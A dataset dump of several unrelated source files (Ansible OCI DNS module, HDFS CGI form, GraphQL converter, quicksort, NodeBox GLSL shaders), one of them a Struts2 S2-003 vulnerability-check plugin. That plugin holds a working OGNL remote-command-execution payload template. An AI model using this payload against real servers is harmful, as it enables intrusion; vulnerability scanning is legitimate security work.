class ResourceHelper(DomainRecordsHelperCustom, DomainRecordsHelperGen):
pass
def main():
module_args = oci_common_utils.get_common_arg_spec(
supports_create=False, supports_wait=False
)
module_args.update(
dict(
zone_name_or_id=dict(
aliases=["zone_id", "name", "zone_name", "id"],
type="str",
required=True,
),
domain=dict(type="str", required=True),
update_items=dict(
type="list",
elements="dict",
options=dict(
domain=dict(type="str", required=True),
record_hash=dict(type="str"),
is_protected=dict(type="bool"),
rdata=dict(type="str", required=True),
rrset_version=dict(type="str"),
rtype=dict(type="str", required=True),
ttl=dict(type="int", required=True),
),
),
if_unmodified_since=dict(type="str"),
scope=dict(type="str", choices=["GLOBAL", "PRIVATE"]),
view_id=dict(type="str"),
compartment_id=dict(type="str"),
patch_items=dict(
type="list",
elements="dict",
options=dict(
domain=dict(type="str"),
record_hash=dict(type="str"),
is_protected=dict(type="bool"),
rdata=dict(type="str"),
rrset_version=dict(type="str"),
rtype=dict(type="str"),
ttl=dict(type="int"),
operation=dict(
type="str", choices=["REQUIRE", "PROHIBIT", "ADD", "REMOVE"]
),
),
),
state=dict(type="str", default="present", choices=["present", "absent"]),
)
)
module = AnsibleModule(argument_spec=module_args)
if not HAS_OCI_PY_SDK:
module.fail_json(msg="oci python sdk required for this module.")
resource_helper = ResourceHelper(
module=module,
resource_type="domain_records",
service_client_class=DnsClient,
namespace="dns",
)
result = dict(changed=False)
if resource_helper.is_delete():
result = resource_helper.delete()
elif resource_helper.is_update():
result = resource_helper.update()
elif resource_helper.is_patch():
result = resource_helper.patch()
module.exit_json(**result)
if __name__ == "__main__":
main()
| 37.83829 | 158 | 0.580095 |
ed794617fcd38ce6fef6ebcfac8f26bc4d1c678f | 314 | py | Python | HDFS-MapRed setup ansible/hdfs.py | ayu-gupta/HDFS-MapRed-Ansible | 1a2c690c686de59856d1ea32b7e0d9efcadbd02b | [
"Apache-2.0"
] | null | null | null | HDFS-MapRed setup ansible/hdfs.py | ayu-gupta/HDFS-MapRed-Ansible | 1a2c690c686de59856d1ea32b7e0d9efcadbd02b | [
"Apache-2.0"
] | null | null | null | HDFS-MapRed setup ansible/hdfs.py | ayu-gupta/HDFS-MapRed-Ansible | 1a2c690c686de59856d1ea32b7e0d9efcadbd02b | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python2
print("content-type: text/html")
print("")
print("Welcome to HDFS Cluster")
print("<br/>")
print("""
<form action='hdfs_setup.py'>
Enter no of DataNode: <input type='text' name='dn' />
<br/>
Enter no of TaskTrackers: <input type='text' name='tt' />
<input type='submit' />
</form>
""")
| 14.952381 | 58 | 0.630573 |
9fa1f84d41443715e48e1d6b3a4997fdab780253 | 2,259 | py | Python | python/app/plugins/http/Struts2/S2_003.py | taomujian/linbing | fe772a58f41e3b046b51a866bdb7e4655abaf51a | [
"MIT"
] | 351 | 2020-02-26T05:23:26.000Z | 2022-03-26T12:39:19.000Z | python/app/plugins/http/Struts2/S2_003.py | taomujian/linbing | fe772a58f41e3b046b51a866bdb7e4655abaf51a | [
"MIT"
] | 15 | 2020-03-26T07:31:49.000Z | 2022-03-09T02:12:17.000Z | python/app/plugins/http/Struts2/S2_003.py | taomujian/linbing | fe772a58f41e3b046b51a866bdb7e4655abaf51a | [
"MIT"
] | 99 | 2020-02-28T07:30:46.000Z | 2022-03-16T16:41:09.000Z | #!/usr/bin/env python3
from app.lib.utils.request import request
from app.lib.utils.common import get_capta, get_useragent
class S2_003_BaseVerify:
def __init__(self, url):
self.info = {
            'name': 'Struts2 S2-003 vulnerability, also known as CVE-2008-6504.',
'description': 'Struts 2.0.0 - Struts 2.1.8.1',
'date': '2008-10-15',
'exptype': 'check',
'type': 'RCE'
}
self.url = url
if not self.url.startswith("http") and not self.url.startswith("https"):
self.url = "http://" + self.url
if '.action' not in self.url:
self.url = self.url + '/example/HelloWorld.action'
self.headers = {
'User-Agent': get_useragent()
}
self.capta = get_capta()
self.payload = r'''?('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003dfalse')(bla)(bla)&('\u0023_memberAccess.excludeProperties\u003d@java.util.Collections@EMPTY_SET')(kxlzx)(kxlzx)&('\u0023mycmd\u003d\'{0}\'')(bla)(bla)&('\u0023myret\u003d@java.lang.Runtime@getRuntime().exec(\u0023mycmd)')(bla)(bla)&(A)(('\u0023mydat\u003dnew\40java.io.DataInputStream(\u0023myret.getInputStream())')(bla))&(B)(('\u0023myres\u003dnew\40byte[51020]')(bla))&(C)(('\u0023mydat.readFully(\u0023myres)')(bla))&(D)(('\u0023mystr\u003dnew\40java.lang.String(\u0023myres)')(bla))&('\u0023myout\u003d@org.apache.struts2.ServletActionContext@getResponse()')(bla)(bla)&(E)(('\u0023myout.getWriter().println(\u0023mystr)')(bla))'''
def check(self):
"""
        Check whether the target is vulnerable
        :param:
        :return bool True or False: whether the vulnerability exists
"""
try:
self.check_payload = self.payload.format('echo\\n' + self.capta)
check_req = request.get(self.url + self.check_payload, headers = self.headers)
if self.capta in check_req.text.replace('\n', '') and len(check_req.text) < 100:
return True
else:
return False
except Exception as e:
print(e)
return False
finally:
pass
if __name__ == "__main__":
S2_003 = S2_003_BaseVerify('http://localhost:8080/s2_003_war_exploded/HelloWorld.action')
print(S2_003.check()) | 44.294118 | 743 | 0.602479 |
7cc259e00245b52bac2b9cede3be9c5235e72960 | 6,605 | py | Python | graphene_sqlalchemy/converter.py | dubbl/graphene-sqlalchemy | e362e3fc4993d7e95873044bb4d00185b1d3dd8b | [
"MIT"
] | null | null | null | graphene_sqlalchemy/converter.py | dubbl/graphene-sqlalchemy | e362e3fc4993d7e95873044bb4d00185b1d3dd8b | [
"MIT"
] | null | null | null | graphene_sqlalchemy/converter.py | dubbl/graphene-sqlalchemy | e362e3fc4993d7e95873044bb4d00185b1d3dd8b | [
"MIT"
] | null | null | null | from singledispatch import singledispatch
from sqlalchemy import types
from sqlalchemy.dialects import postgresql
from sqlalchemy.orm import interfaces
from graphene import (ID, Boolean, Dynamic, Enum, Field, Float, Int, List,
String)
from graphene.types.json import JSONString
try:
from sqlalchemy_utils import ChoiceType, JSONType, ScalarListType, TSVectorType
except ImportError:
ChoiceType = JSONType = ScalarListType = TSVectorType = object
def get_column_doc(column):
return getattr(column, "doc", None)
def is_column_nullable(column):
return bool(getattr(column, "nullable", True))
def convert_sqlalchemy_relationship(relationship, registry, connection_field_factory):
direction = relationship.direction
model = relationship.mapper.entity
def dynamic_type():
_type = registry.get_type_for_model(model)
if not _type:
return None
if direction == interfaces.MANYTOONE or not relationship.uselist:
return Field(_type)
elif direction in (interfaces.ONETOMANY, interfaces.MANYTOMANY):
if _type._meta.connection:
return connection_field_factory(relationship, registry)
return Field(List(_type))
return Dynamic(dynamic_type)
def convert_sqlalchemy_hybrid_method(hybrid_item):
return String(description=getattr(hybrid_item, "__doc__", None), required=False)
def convert_sqlalchemy_composite(composite, registry):
converter = registry.get_converter_for_composite(composite.composite_class)
if not converter:
try:
raise Exception(
"Don't know how to convert the composite field %s (%s)"
% (composite, composite.composite_class)
)
except AttributeError:
# handle fields that are not attached to a class yet (don't have a parent)
raise Exception(
"Don't know how to convert the composite field %r (%s)"
% (composite, composite.composite_class)
)
return converter(composite, registry)
def _register_composite_class(cls, registry=None):
if registry is None:
from .registry import get_global_registry
registry = get_global_registry()
def inner(fn):
registry.register_composite_converter(cls, fn)
return inner
convert_sqlalchemy_composite.register = _register_composite_class
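# A minimal sketch (not part of the upstream module) of how a project could register a
# composite converter through the hook exposed above; `Point` is a hypothetical composite
# class used only to illustrate the mechanism.
#
#     @convert_sqlalchemy_composite.register(Point)
#     def convert_point(composite_prop, registry):
#         # Expose the composite's float columns as a list of floats.
#         return List(Float)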
def convert_sqlalchemy_column(column, registry=None):
return convert_sqlalchemy_type(getattr(column, "type", None), column, registry)
@singledispatch
def convert_sqlalchemy_type(type, column, registry=None):
raise Exception(
"Don't know how to convert the SQLAlchemy field %s (%s)"
% (column, column.__class__)
)
@convert_sqlalchemy_type.register(types.Date)
@convert_sqlalchemy_type.register(types.Time)
@convert_sqlalchemy_type.register(types.String)
@convert_sqlalchemy_type.register(types.Text)
@convert_sqlalchemy_type.register(types.Unicode)
@convert_sqlalchemy_type.register(types.UnicodeText)
@convert_sqlalchemy_type.register(postgresql.UUID)
@convert_sqlalchemy_type.register(postgresql.INET)
@convert_sqlalchemy_type.register(postgresql.CIDR)
@convert_sqlalchemy_type.register(TSVectorType)
def convert_column_to_string(type, column, registry=None):
return String(
description=get_column_doc(column), required=not (is_column_nullable(column))
)
@convert_sqlalchemy_type.register(types.DateTime)
def convert_column_to_datetime(type, column, registry=None):
from graphene.types.datetime import DateTime
return DateTime(
description=get_column_doc(column), required=not (is_column_nullable(column))
)
@convert_sqlalchemy_type.register(types.SmallInteger)
@convert_sqlalchemy_type.register(types.Integer)
def convert_column_to_int_or_id(type, column, registry=None):
if column.primary_key:
return ID(
description=get_column_doc(column),
required=not (is_column_nullable(column)),
)
else:
return Int(
description=get_column_doc(column),
required=not (is_column_nullable(column)),
)
@convert_sqlalchemy_type.register(types.Boolean)
def convert_column_to_boolean(type, column, registry=None):
return Boolean(
description=get_column_doc(column), required=not (is_column_nullable(column))
)
@convert_sqlalchemy_type.register(types.Float)
@convert_sqlalchemy_type.register(types.Numeric)
@convert_sqlalchemy_type.register(types.BigInteger)
def convert_column_to_float(type, column, registry=None):
return Float(
description=get_column_doc(column), required=not (is_column_nullable(column))
)
@convert_sqlalchemy_type.register(types.Enum)
def convert_enum_to_enum(type, column, registry=None):
enum_class = getattr(type, 'enum_class', None)
if enum_class: # Check if an enum.Enum type is used
graphene_type = Enum.from_enum(enum_class)
else: # Nope, just a list of string options
items = zip(type.enums, type.enums)
graphene_type = Enum(type.name, items)
return Field(
graphene_type,
description=get_column_doc(column),
required=not (is_column_nullable(column)),
)
@convert_sqlalchemy_type.register(ChoiceType)
def convert_column_to_enum(type, column, registry=None):
name = "{}_{}".format(column.table.name, column.name).upper()
return Enum(name, type.choices, description=get_column_doc(column))
@convert_sqlalchemy_type.register(ScalarListType)
def convert_scalar_list_to_list(type, column, registry=None):
return List(String, description=get_column_doc(column))
@convert_sqlalchemy_type.register(postgresql.ARRAY)
def convert_postgres_array_to_list(_type, column, registry=None):
graphene_type = convert_sqlalchemy_type(column.type.item_type, column)
inner_type = type(graphene_type)
return List(
inner_type,
description=get_column_doc(column),
required=not (is_column_nullable(column)),
)
@convert_sqlalchemy_type.register(postgresql.HSTORE)
@convert_sqlalchemy_type.register(postgresql.JSON)
@convert_sqlalchemy_type.register(postgresql.JSONB)
def convert_json_to_string(type, column, registry=None):
return JSONString(
description=get_column_doc(column), required=not (is_column_nullable(column))
)
@convert_sqlalchemy_type.register(JSONType)
def convert_json_type_to_string(type, column, registry=None):
return JSONString(
description=get_column_doc(column), required=not (is_column_nullable(column))
)
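# Likewise, additional column types can be handled by registering another converter on the
# singledispatch function above. A sketch (not part of the upstream module), using
# SQLAlchemy's Interval type as an example:
#
#     @convert_sqlalchemy_type.register(types.Interval)
#     def convert_interval_to_string(type, column, registry=None):
#         return String(
#             description=get_column_doc(column), required=not (is_column_nullable(column))
#         )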
| 33.527919 | 86 | 0.738834 |
27c55aed7c8e479e0934e9a5c856b2274d2d7689 | 2,022 | py | Python | inquiry/inquiry.py | movermeyer/inquiry | f6ea435c302560ba19985b5d4ce2c97e2f321508 | [
"Apache-2.0"
] | null | null | null | inquiry/inquiry.py | movermeyer/inquiry | f6ea435c302560ba19985b5d4ce2c97e2f321508 | [
"Apache-2.0"
] | null | null | null | inquiry/inquiry.py | movermeyer/inquiry | f6ea435c302560ba19985b5d4ce2c97e2f321508 | [
"Apache-2.0"
] | null | null | null | import os
from .figure import Figure
from .navigator import Navigator
try:
from psycopg2.extensions import adapt
except ImportError:
def adapt(value):
raise EnvironmentError("No adapting method found.")
class Inquiry(object):
def __init__(self, figures=None, debug=None):
"""Debug will sort the sql statement for testing accuracy
"""
self.debug = ((str(os.getenv('DEBUG', 'FALSE')).upper()=='TRUE') or os.getenv('CI')) if debug is None else debug
self.figures = dict([(name, Figure(name, json)) for name, json in figures.items()]) if figures else {}
self.build()
def adapt(self, value, *extra_data):
"""Return the value adapted for sql
"""
return adapt(value)
def query(self, query):
"""Return the results of this query
"""
pass
def build(self):
"""Get all the figures
"""
pass
def format(self, key, value, *_):
"""Format the returned results as they are yielded
"""
return value
def adapter(self, *extra_data):
"""Return value to be passed when adapting with valideer
ie. `valideer.parse(schema).validate(user_args, adapt=__this__)`
"""
return True
def add_figure(self, name, json):
self.figures[name] = Figure(name, json)
def new(self, *args):
""":args and :kwargs are passed through the figure
"""
return Navigator(self, args)
def make(self, *args, **kwargs):
return Navigator(self)(*args, **kwargs)
def get(self, index):
index = index.lower()
if index in self.figures:
return self.figures.get(index)
elif (index+"s") in self.figures:
return self.figures.get(index+"s")
for key in self.figures:
if index in self.figures[key].alias or index+"s" in self.figures[key].alias:
return self.figures[key]
raise LookupError('No figure found for `'+index+'`')
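# Usage sketch (not part of the original module); `users_json` stands for a figure
# definition whose exact layout is determined by Figure and is not shown here.
#
#     inq = Inquiry(figures={"users": users_json})
#     nav = inq.new() # a Navigator over the figures
#     fig = inq.get("user") # singular/plural forms and aliases are resolved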
| 29.735294 | 120 | 0.596934 |
3a2c88444eb6d125ed9c6eaec55c23f740397e51 | 63 | py | Python | recap_agr/__main__.py | MirkoLenz/ReCAP-Argument-Graph-Retrieval | 5ff0b637aebfa59783f70617ebf5e618ca95168c | [
"Apache-2.0"
] | null | null | null | recap_agr/__main__.py | MirkoLenz/ReCAP-Argument-Graph-Retrieval | 5ff0b637aebfa59783f70617ebf5e618ca95168c | [
"Apache-2.0"
] | null | null | null | recap_agr/__main__.py | MirkoLenz/ReCAP-Argument-Graph-Retrieval | 5ff0b637aebfa59783f70617ebf5e618ca95168c | [
"Apache-2.0"
] | 1 | 2021-11-06T10:17:38.000Z | 2021-11-06T10:17:38.000Z | if __name__ == "__main__":
from .app import run
run()
| 12.6 | 26 | 0.587302 |
320c61502e441727f75371975a065d5fb4d57188 | 309 | py | Python | cs231n/numpy/01_quicksort.py | urunimi/cs231n | 55ed1323e1044440d8be5277116bd5a76c19d4c3 | [
"Apache-2.0"
] | null | null | null | cs231n/numpy/01_quicksort.py | urunimi/cs231n | 55ed1323e1044440d8be5277116bd5a76c19d4c3 | [
"Apache-2.0"
] | null | null | null | cs231n/numpy/01_quicksort.py | urunimi/cs231n | 55ed1323e1044440d8be5277116bd5a76c19d4c3 | [
"Apache-2.0"
] | null | null | null | def quicksort(arr):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quicksort(left) + middle + quicksort(right)
print(quicksort([3,6,8,10,1,2,1])) | 30.9 | 54 | 0.576052 |
6ca13146a0ab6a4d419f6328cc6bb5ce59b8fd1e | 79 | py | Python | pages/components/divider/_colors.py | AnnMarieW/dmc-docs | 5db1790b61e85209b85adb75ccf6e7462d93f231 | [
"MIT"
] | null | null | null | pages/components/divider/_colors.py | AnnMarieW/dmc-docs | 5db1790b61e85209b85adb75ccf6e7462d93f231 | [
"MIT"
] | null | null | null | pages/components/divider/_colors.py | AnnMarieW/dmc-docs | 5db1790b61e85209b85adb75ccf6e7462d93f231 | [
"MIT"
] | null | null | null | import dash_mantine_components as dmc
component = dmc.Divider(color="violet")
| 19.75 | 39 | 0.810127 |
bedb15a081cb8d5880d1635f84e3aa80e18e6f95 | 59,842 | py | Python | graphics/shader.py | est/nodebox-gl | f1909a7a4ebc55c8ba254f92e25acb26e8cf1f1d | [
"BSD-3-Clause"
] | 1 | 2015-09-29T14:22:49.000Z | 2015-09-29T14:22:49.000Z | graphics/shader.py | est/nodebox-gl | f1909a7a4ebc55c8ba254f92e25acb26e8cf1f1d | [
"BSD-3-Clause"
] | 1 | 2015-09-29T14:23:35.000Z | 2015-09-30T02:33:13.000Z | graphics/shader.py | est/nodebox-gl | f1909a7a4ebc55c8ba254f92e25acb26e8cf1f1d | [
"BSD-3-Clause"
] | null | null | null | #=== SHADER ==========================================================================================
# Fragment shaders, filters, Frame Buffer Object (FBO)
# Authors: Tom De Smedt, Frederik De Bleser
# License: BSD (see LICENSE.txt for details).
# Copyright (c) 2008 City In A Bottle (cityinabottle.org)
# http://cityinabottle.org/nodebox
from pyglet.image import Texture, SolidColorImagePattern
from pyglet.gl import *
from geometry import lerp
from math import radians
#=====================================================================================================
pow2 = [2**n for n in range(20)] # [1, 2, 4, 8, 16, 32, 64, ...]
def ceil2(x):
""" Returns the nearest power of 2 that is higher than x, e.g. 700 => 1024.
"""
for y in pow2:
if y >= x: return y
def extent2(texture):
""" Returns the extent of the image data (0.0-1.0, 0.0-1.0) inside its texture owner.
Textures have a size power of 2 (512, 1024, ...), but the actual image can be smaller.
For example: a 400x250 image will be loaded in a 512x256 texture.
Its extent is (0.78, 0.98), the remainder of the texture is transparent.
"""
return (texture.tex_coords[3], texture.tex_coords[7])
def ratio2(texture1, texture2):
""" Returns the size ratio (0.0-1.0, 0.0-1.0) of two texture owners.
"""
return (
float(ceil2(texture1.width)) / ceil2(texture2.width),
float(ceil2(texture1.height)) / ceil2(texture2.height)
)
def find(f, seq):
""" Return first item in the sequence where f(item) == True.
"""
for item in seq:
if f(item): return item
def clamp(value, a, b):
""" Returns value clamped between a (minimum) and b (maximum).
"""
return max(a, min(value, b))
#=====================================================================================================
#--- SHADER ------------------------------------------------------------------------------------------
# A shader is a pixel effect (motion blur, fog, glow) executed on the GPU.
# The effect has two distinct parts: a vertex shader and a fragment shader.
# The vertex shader retrieves the coordinates of the current pixel.
# The fragment shader manipulates the color of the current pixel.
# http://www.lighthouse3d.com/opengl/glsl/index.php?fragmentp
# Shaders are written in GLSL and expect their variables to be set from glUniform() calls.
# The Shader class compiles the source code and has an easy way to pass variables to GLSL.
# e.g. shader = Shader(fragment=open("colorize.frag").read())
# shader.set("color", vec4(1, 0.8, 1, 1))
# shader.push()
# image("box.png", 0, 0)
# shader.pop()
DEFAULT = "default"
DEFAULT_VERTEX_SHADER = '''
void main() {
gl_TexCoord[0] = gl_MultiTexCoord0;
gl_Position = ftransform();
}'''
DEFAULT_FRAGMENT_SHADER = '''
uniform sampler2D src;
void main() {
gl_FragColor = texture2D(src, gl_TexCoord[0].xy);
}'''
class vector(tuple):
pass
def vec2(f1, f2):
return vector((f1, f2))
def vec3(f1, f2, f3):
return vector((f1, f2, f3))
def vec4(f1, f2, f3, f4):
return vector((f1, f2, f3, f4))
COMPILE = "compile" # Error occurs during glCompileShader().
BUILD = "build" # Error occurs during glLinkProgram().
class ShaderError(Exception):
def __init__(self, value, type=COMPILE):
Exception.__init__(self, "%s error: %s" % (type, value))
self.value = value
self.type = type
class Shader(object):
def __init__(self, vertex=DEFAULT, fragment=DEFAULT):
""" A per-pixel shader effect (blur, fog, glow, ...) executed on the GPU.
Shader wraps a compiled GLSL program and facilitates passing parameters to it.
The fragment and vertex parameters contain the GLSL source code to execute.
Raises a ShaderError if the source fails to compile.
Once compiled, you can set uniform variables in the GLSL source with Shader.set().
"""
if vertex == DEFAULT:
vertex = DEFAULT_VERTEX_SHADER
if fragment == DEFAULT:
fragment = DEFAULT_FRAGMENT_SHADER
self._vertex = vertex # GLSL source for vertex shader.
self._fragment = fragment # GLSL source for fragment shader.
self._compiled = []
self._program = None
self._active = False
self.variables = {}
self._build()
def _compile(self, source, type=GL_VERTEX_SHADER):
# Compile the GLSL source code, either as GL_FRAGMENT_SHADER or GL_VERTEX_SHADER.
# If the source fails to compile, retrieve the error message and raise ShaderError.
# Store the compiled shader so we can delete it later on.
shader = glCreateShader(type)
status = c_int(-1)
glShaderSource(shader, 1, cast(pointer(c_char_p(source)), POINTER(POINTER(c_char))), None)
glCompileShader(shader)
glGetShaderiv(shader, GL_COMPILE_STATUS, byref(status))
if status.value == 0:
raise self._error(shader, type=COMPILE)
self._compiled.append(shader)
return shader
def _build(self):
# Each Shader has its own OpenGL rendering program and you need to switch between them.
# Compile fragment and vertex shaders and build the program.
program = glCreateProgram()
status = c_int(-1)
if self._vertex:
glAttachShader(program, self._compile(self._vertex, GL_VERTEX_SHADER))
if self._fragment:
glAttachShader(program, self._compile(self._fragment, GL_FRAGMENT_SHADER))
glLinkProgram(program)
glGetProgramiv(program, GL_LINK_STATUS, byref(status))
if status.value == 0:
raise self._error(program, type=BUILD)
self._program = program
def _error(self, obj, type=COMPILE):
# Get the info for the failed glCompileShader() or glLinkProgram(),
# delete the failed shader or program,
# return a ShaderError with the error message.
f1 = type==COMPILE and glGetShaderiv or glGetProgramiv
f2 = type==COMPILE and glGetShaderInfoLog or glGetProgramInfoLog
f3 = type==COMPILE and glDeleteShader or glDeleteProgram
length = c_int(); f1(obj, GL_INFO_LOG_LENGTH, byref(length))
msg = ""
if length.value > 0:
msg = create_string_buffer(length.value); f2(obj, length, byref(length), msg)
msg = msg.value
f3(obj)
return ShaderError(msg, type)
def get(self, name):
""" Returns the value of the variable with the given name.
"""
return self.variables[name]
def set(self, name, value):
""" Set the value of the variable with the given name in the GLSL source script.
Supported variable types are: vec2(), vec3(), vec4(), single int/float, list of int/float.
Variables will be initialized when Shader.push() is called (i.e. glUseProgram).
"""
self.variables[name] = value
if self._active:
self._set(name, value)
def _set(self, name, value):
address = glGetUniformLocation(self._program, name)
# A vector with 2, 3 or 4 floats representing vec2, vec3 or vec4.
if isinstance(value, vector):
if len(value) == 2:
glUniform2f(address, value[0], value[1])
elif len(value) == 3:
glUniform3f(address, value[0], value[1], value[2])
elif len(value) == 4:
glUniform4f(address, value[0], value[1], value[2], value[3])
# A list representing an array of ints or floats.
elif isinstance(value, (list, tuple)):
if find(lambda v: isinstance(v, float), value):
array = c_float * len(value)
glUniform1fv(address, len(value), array(*value))
else:
array = c_int * len(value)
glUniform1iv(address, len(value), array(*value))
# Single float value.
elif isinstance(value, float):
glUniform1f(address, value)
# Single int value or named texture.
elif isinstance(value, int):
glUniform1i(address, value)
else:
ShaderError, "don't know how to handle variable %s" % value.__class__
def push(self):
""" Installs the program and sets its variables.
When you use the image() command between shader.push() and shader.pop(),
the shader's effect will be applied to the image before drawing it.
To use shader effects in combination with paths,
            draw the path in an offscreen buffer, render it, and apply the effect to the render.
"""
self._active = True
glUseProgram(self._program)
for k, v in self.variables.items():
self._set(k, v)
def pop(self):
# Note that shaders can't be nested since they all have their own program,
# pop() just removes any active program.
if self._active == True:
glUseProgram(0)
self._active = False
@property
def active(self):
return self._active
@property
def source(self):
return (self._vertex, self._fragment)
def __del__(self):
try:
for shader in self._compiled:
if glDetachShader and self._program:
glDetachShader(self._program, shader)
if glDeleteShader:
glDeleteShader(shader)
if glDeleteProgram:
glDeleteProgram(self._program)
except:
pass
class ShaderFacade:
def __init__(self, vertex=None, fragment=None):
# Acts like a shader but doesn't do anything.
pass
@property
def variables(self):
return {}
@property
def active(self):
return None
def get(self, name):
return None
def set(self, name, value):
pass
def push(self):
pass
def pop(self):
pass
SUPPORTED = True # Graphics hardware supports shaders?
def shader(vertex=DEFAULT_VERTEX_SHADER, fragment=DEFAULT_FRAGMENT_SHADER, silent=True):
""" Returns a compiled Shader from the given GLSL source code.
With silent=True, never raises an error but instead returns a ShaderFacade.
During startup, a number of Shaders are created.
This mechanisms ensures that the module doesn't crash while doing this,
instead the shader simply won't have any visible effect and SUPPORTED will be False.
"""
if not silent:
return Shader(vertex, fragment)
try:
return Shader(vertex, fragment)
except Exception, e:
        global SUPPORTED; SUPPORTED = False
return ShaderFacade()
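# Example (a sketch, not used elsewhere in this module): a grayscale effect compiled with
# the silent fallback; on hardware without GLSL support this returns a ShaderFacade and
# drawing simply happens without the effect.
#
#     _grayscale = shader(fragment='''
#     uniform sampler2D src;
#     void main() {
#         vec4 p = texture2D(src, gl_TexCoord[0].xy);
#         float L = dot(p.rgb, vec3(0.2125, 0.7154, 0.0721));
#         gl_FragColor = vec4(L, L, L, p.a);
#     }''')
#     _grayscale.push()
#     # ... draw the texture here ...
#     _grayscale.pop()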
#=====================================================================================================
#--- FILTER ------------------------------------------------------------------------------------------
# Stores a shader's variables and applies them once push() is called.
# The shader is created only once for perfomance while filters can exist multiple times.
# Textures that are drawn between Filter.push() and Filter.pop() have the effect applied to them.
class Filter(object):
def __init__(self):
""" Filter combines a Shader with variable settings.
Variables need to be prepared in Filter.push() before passing them to the shader:
e.g. creating a list of kernel values, calculating a scale based on image height, ...
Performance note: create the Shader separately, not during initialization.
"""
# Shader and its variables need to be stored here.
self.shader = None
self.texture = None
def push(self):
""" Installs the filter so it will be applied to the next image() call.
"""
# Shader needs to set its variables here:
# self.shader.set(variable, value)
self.shader.push()
def pop(self):
""" Removes the filter.
"""
self.shader.pop()
#=====================================================================================================
#--- INVERT -----------------------------------------------------------------------------------------
_invert = shader(fragment='''
uniform sampler2D src;
void main() {
gl_FragColor = texture2D(src, gl_TexCoord[0].xy);
gl_FragColor.rgb = 1.0 - gl_FragColor.rgb;
}''')
class Invert(Filter):
def __init__(self, texture):
self.shader = _invert
self.texture = texture
def push(self):
self.shader.push()
#--- GRADIENT ----------------------------------------------------------------------------------------
LINEAR = "linear"
RADIAL = "radial"
_gradient = {}
_gradient[LINEAR] = shader(fragment='''
uniform sampler2D src;
uniform vec4 clr1;
uniform vec4 clr2;
void main() {
vec2 v = gl_TexCoord[0].xy;
gl_FragColor = clr1 * v.y + clr2 * (1.0 - v.y);
}''')
_gradient[RADIAL] = shader(fragment='''
uniform sampler2D src;
uniform vec4 clr1;
uniform vec4 clr2;
void main() {
vec2 v = gl_TexCoord[0].xy - 0.5;
float d = 4.0 * (v.x * v.x + v.y * v.y);
gl_FragColor = clr1 * (1.0 - d) + clr2 * d;
}''')
class LinearGradient(Filter):
def __init__(self, texture, clr1=vec4(0,0,0,1), clr2=vec4(1,1,1,1)):
self.shader = _gradient[LINEAR]
self.texture = texture
self.clr1 = clr1
self.clr2 = clr2
def push(self):
self.shader.set("clr1", self.clr1)
self.shader.set("clr2", self.clr2)
self.shader.push()
class RadialGradient(Filter):
def __init__(self, texture, clr1=vec4(0,0,0,1), clr2=vec4(1,1,1,1)):
self.shader = _gradient[RADIAL]
self.texture = texture
self.clr1 = clr1
self.clr2 = clr2
def push(self):
self.shader.set("clr1", self.clr1)
self.shader.set("clr2", self.clr2)
self.shader.push()
#--- COLORIZE ---------------------------------------------------------------------------------------
_colorize = shader(fragment='''
uniform sampler2D src;
uniform vec4 color;
uniform vec4 bias;
void main() {
vec4 p = texture2D(src, gl_TexCoord[0].xy);
gl_FragColor = clamp(p * color + bias, 0.0, 1.0);
}''')
class Colorize(Filter):
def __init__(self, texture, color=vec4(1,1,1,1), bias=vec4(0,0,0,0)):
self.shader = _colorize
self.texture = texture
self.color = color
self.bias = bias
def push(self):
self.shader.set("color", self.color)
self.shader.set("bias", self.bias)
self.shader.push()
#--- COLORSPACE -------------------------------------------------------------------------------------
# Helper functions for conversion between RGB and HSB that we can use in other filters.
# Based on "Photoshop math with GLSL shaders" (2009), Romain Dura,
# http://blog.mouaif.org/?p=94
glsl_hsb2rgb = '''
float _hue2rgb(float a, float b, float hue) {
hue = mod(hue, 1.0);
if (6.0 * hue < 1.0) return a + (b - a) * 6.0 * hue;
if (2.0 * hue < 1.0) return b;
if (3.0 * hue < 2.0) return a + (b - a) * 6.0 * (2.0/3.0 - hue);
return a;
}
vec3 hsb2rgb(vec3 hsb) {
if (hsb.y == 0.0) return vec3(hsb.z);
float b = (hsb.z < 0.5)? hsb.z * (1.0 + hsb.y) : (hsb.y + hsb.z) - (hsb.y * hsb.z);
float a = 2.0 * hsb.z - b;
return vec3(
_hue2rgb(a, b, hsb.x + (1.0/3.0)),
_hue2rgb(a, b, hsb.x),
_hue2rgb(a, b, hsb.x - (1.0/3.0))
);
}'''
glsl_rgb2hsb = '''
vec3 rgb2hsb(vec3 rgb) {
vec3 hsb = vec3(0.0);
float a = min(min(rgb.r, rgb.g), rgb.b);
float b = max(max(rgb.r, rgb.g), rgb.b);
float c = b - a;
if (c != 0.0) {
vec3 d = ((vec3(b) - rgb) / 6.0 + c / 2.0) / c;
if (rgb.r == b) hsb.x = d.b - d.g;
else if (rgb.g == b) hsb.x = d.r - d.b + 1.0/3.0;
else if (rgb.b == b) hsb.x = d.g - d.r + 2.0/3.0;
hsb.x = mod(hsb.x, 1.0);
hsb.y = (hsb.z < 0.5)? c / (a+b) : c / (2.0 - c);
}
hsb.z = (a+b) / 2.0;
return hsb;
}''';
#--- ADJUSTMENTS ------------------------------------------------------------------------------------
BRIGHTNESS = "brightness"
CONTRAST = "contrast"
SATURATION = "saturation"
HUE = "hue"
_adjustment = {}
_adjustment[BRIGHTNESS] = shader(fragment='''
uniform sampler2D src;
uniform float m;
void main() {
vec4 p = texture2D(src, gl_TexCoord[0].xy);
gl_FragColor = vec4(clamp(p.rgb + m, 0.0, 1.0), p.a);
}''')
_adjustment[CONTRAST] = shader(fragment='''
uniform sampler2D src;
uniform float m;
void main() {
vec4 p = texture2D(src, gl_TexCoord[0].xy);
gl_FragColor = vec4(clamp((p.rgb - 0.5) * m + 0.5, 0.0, 1.0), p.a);
}''')
_adjustment[SATURATION] = shader(fragment='''
uniform sampler2D src;
uniform float m;
void main() {
vec4 p = texture2D(src, gl_TexCoord[0].xy);
float i = 0.3 * p.r + 0.59 * p.g + 0.11 * p.b;
gl_FragColor = vec4(
i * (1.0 - m) + p.r * m,
i * (1.0 - m) + p.g * m,
i * (1.0 - m) + p.b * m,
p.a
);
}''')
_adjustment[HUE] = shader(fragment=glsl_hsb2rgb+glsl_rgb2hsb+'''
uniform sampler2D src;
uniform float m;
void main() {
